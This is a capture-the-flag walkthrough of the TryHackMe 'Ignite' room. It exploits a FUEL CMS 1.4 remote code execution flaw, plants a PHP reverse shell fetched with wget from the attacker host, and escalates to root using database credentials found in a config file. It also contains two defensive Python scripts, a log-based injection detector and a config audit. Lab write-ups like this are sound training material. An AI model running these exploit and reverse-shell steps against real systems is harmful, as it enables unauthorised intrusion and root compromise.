Ignite is a room that has no instructions other than to get two flags, User.txt and Root.txt; essentially a black box.  No hand-holding or guiding of any sort.  Let’s put everything we’ve learned up until this point to use and hack the box!

Scan the Box

The first thing we should do is perform a network scan with nmap.  With -A, this shows us the open ports and the services running on them, together with version detection and the output of nmap’s default scripts.

$ nmap  x.x.x.x -A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 11:00 PDT
Nmap scan report for x.x.x.x 
Host is up (0.22s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.11 seconds
There is a web server on port 80; browsing to it, we are met with the welcome page.  It looks like a fresh install of FUEL CMS, a content management system framework.  Note that this is version 1.4.

Nmap also shows that the web server is Apache/2.4.18.

Research

Let’s see what kind of vulnerabilities we can find for these particular services. 

Apache/2.4.18

I found a ‘logrotate’ Local Privilege Escalation exploit.

This involves running the script on the web server and waiting for the logrotate cron job to rotate the logs at 6:25 AM, which reboots the Apache server and sets the SUID bit on the Python 3 binary, allowing us to run Python 3 commands as root (let’s revisit this later).

Fuel CMS 1.4

I found a remote code execution exploit for FUEL CMS <= 1.4.1.  It is a Python 2 script that achieves PHP code evaluation via the pages/select/ filter parameter.  We can send commands to the server, which are executed in a shell, and the results are returned in the HTTP response body.
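From the defender’s side, the useful fact in that description is the request shape: a GET to the pages/select/ endpoint carrying a filter parameter that is evaluated as PHP.  The following Python is an added example (not part of this writeup and not from the Exploit-DB script) that parses Apache access-log lines and flags requests to that endpoint whose decoded filter value contains quote, parenthesis, `$`, `;` or backtick characters, which a legitimate page-name filter never needs.  The log lines are constructed for the example; the endpoint path comes from the description above, and the metacharacter set is an assumption to tune against your own traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access log lines (sample data, not from any real host).
SAMPLE_LOG = """\
203.0.113.5 - - [12/May/2020:11:02:13 -0700] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [12/May/2020:11:02:20 -0700] "GET /fuel/login HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.9 - - [12/May/2020:11:05:44 -0700] "GET /fuel/pages/select/?filter=%27%29%3B%24x%28%29%3B%2F%2F HTTP/1.1" 200 1930 "-" "python-requests/2.23.0"
198.51.100.9 - - [12/May/2020:11:06:01 -0700] "GET /fuel/pages/select/?filter=home HTTP/1.1" 200 1204 "-" "Mozilla/5.0"
"""

# Apache "combined" format; the referer/user-agent pair is optional so "common" format parses too.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Assumed: the endpoint path from the vulnerability description, and a metacharacter
# set that a legitimate page-name filter should never contain.  Tune both per deployment.
TARGET_PATH = "/fuel/pages/select"
SUSPICIOUS = re.compile(r"['\"()$;`]")


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_filter_injection(lines):
    """Return one finding per request to the select endpoint whose URL-decoded
    filter value contains metacharacters.  parse_qs does the percent-decoding."""
    findings = []
    for line in lines:
        fields = parse_line(line)
        if not fields:
            continue
        parts = urlsplit(fields["target"])
        if not parts.path.startswith(TARGET_PATH):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get("filter", []):
            if SUSPICIOUS.search(value):
                findings.append({
                    "ip": fields["ip"],
                    "ts": fields["ts"],
                    "status": fields["status"],
                    "ua": fields["ua"],
                    "filter": value,
                })
    return findings


if __name__ == "__main__":
    for f in find_filter_injection(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} status={f['status']} ua={f['ua']!r} filter={f['filter']!r}")
```

Only the third line is reported: the filter value decodes to `');$x();//`, and the user agent of a scripting library on an admin-only CMS endpoint is a second signal worth alerting on.  The `filter=home` request on the same endpoint is left alone, so the rule keys on the parameter content rather than on the path alone.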

Execution

Let’s download the Python script from Exploit-DB and change the URL to match the target machine’s IP.

# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib

url = "CHANGE THIS TO TARGET MACHINE IP AND PORT"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start
    
...
Run the Python script.  We are met with a command prompt.  Here, we can send commands to the web server, and the output of each command is returned in the HTTP response.  Let’s see what directory we are in.

cmd: pwd
/var/www/html
...
<html response body> 

Our goal is to get a reverse shell on the machine.  We can upload the shell script to the current working directory (the web root) and access it directly in the browser without specifying additional directories in the URL.

We can find a compatible PHP reverse shell script here: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

The reverse shell script must be modified so that it connects back to our host machine on a specified port.  The host machine IP is the one TryHackMe’s VPN assigns you, which can be found at https://tryhackme.com/access.

...
set_time_limit (0);
$VERSION = "1.0";
$ip = 'x.x.x.x';  // CHANGE THIS
$port = 1235;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
... 

To transfer the reverse-shell script, we can start a Python SimpleHTTPServer on our host machine and use the wget command on the target to download the file.

Note that the directory you start the Python HTTP server in is the directory it serves files from, so make sure to start the server in the same directory as your php-reverse-shell.php file.

Then we can start netcat listening on the port specified in the reverse-shell script, navigate to the reverse-shell file path in the web browser, and boom, we have a reverse shell.

Host machine:
$ python -m SimpleHTTPServer 8000

------------------------------------
Target machine:
cmd: wget http://[host_ip]:8000/php-reverse-shell.php

------------------------------------
Host machine:
$ nc -nlvp <port from reverse-shell script>

------------------------------------
Host machine web browser:
http://[machine_ip]/php-reverse-shell.php

------------------------------------
*netcat output*
Listening on 0.0.0.0 1235
Connection received on 10.10.245.169 59774
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 13:49:50 up 26 min,  0 users,  load average: 1.49, 1.21, 0.87
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

First Flag

Search the server for the first flag.  The room says to find “User.txt”, but there’s no file matching that name in any directory we have access to.

Let’s search for all .txt files in directories we have access to.

$ find / -type f -name '*.txt' 2>/dev/null
...
/home/www-data/flag.txt
... 

Cat the contents of the file, and that’s the first flag!

Root Access

In step 2 of ‘Getting Started’ on the home page of the web server, there are instructions for setting up the database, including where the config file is located.

The configuration file includes the root user’s credentials, including the password!
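Two separate weaknesses combine here: the database config names the root account with a plaintext password, and the file is readable by the web server account that the RCE runs as.  The following Python is an added example (not from this writeup or from FUEL CMS) of a small audit that checks both: it reports whether a config file is readable or writable by others, whether the configured database user is root, and whether a plaintext password is present, without ever printing the password.  The `$db['default'][...]` key layout is assumed from the CodeIgniter-style config FUEL CMS uses; the sample file content is constructed, and `demo()` writes it to a temporary file so the check runs offline.

```python
import os
import re
import stat
import tempfile

# Assumed key layout: CodeIgniter-style $db['default']['username'] / ['password'] entries.
USER_RE = re.compile(r"\[\s*['\"]username['\"]\s*\]\s*=\s*['\"](?P<user>[^'\"]*)['\"]")
PASS_RE = re.compile(r"\[\s*['\"]password['\"]\s*\]\s*=\s*['\"](?P<pw>[^'\"]*)['\"]")


def audit_config(path):
    """Return a list of finding tags for one config file; an empty list means clean."""
    findings = []
    mode = os.stat(path).st_mode
    # Permission bits: anything readable by 'other' is readable by a compromised
    # service account, and writable-by-other lets it be tampered with.
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    user = USER_RE.search(text)
    if user and user.group("user") == "root":
        findings.append("db-user-is-root")
    pw = PASS_RE.search(text)
    if pw:
        # Report presence only; the value itself is deliberately never logged.
        findings.append("plaintext-password" if pw.group("pw") else "empty-password")
    return findings


def demo():
    """Run the audit on a constructed config before and after tightening its mode."""
    # Constructed sample content, not a real configuration file.
    sample = (
        "<?php\n"
        "$db['default']['username'] = 'root';\n"
        "$db['default']['password'] = 'constructed-example';\n"
    )
    with tempfile.NamedTemporaryFile("w", suffix=".php", delete=False) as fh:
        fh.write(sample)
        path = fh.name
    try:
        os.chmod(path, 0o644)          # typical default: readable by everyone
        before = audit_config(path)
        os.chmod(path, 0o640)          # owner plus the web server group only
        after = audit_config(path)
    finally:
        os.unlink(path)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("0644:", before)
    print("0640:", after)
```

Tightening the mode removes only the permission finding; the root user and plaintext password findings remain because they need a dedicated low-privilege database account and, ideally, a secret that is not shared with the system root password, which is what the rest of this walkthrough takes advantage of.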

One problem: the current netcat shell we are using does not have a TTY, and without one we cannot interact with su and log in as root.

There are various methods to spawn a TTY shell, depending on what services are on the system and what permissions you have.  A resource I found is here: 

The command that works in our case is:
python -c 'import pty; pty.spawn("/bin/sh")' 

Now that we have a proper interactive TTY shell, we can su to root, enter the password, and finally cat out the contents of root.txt to get the final flag.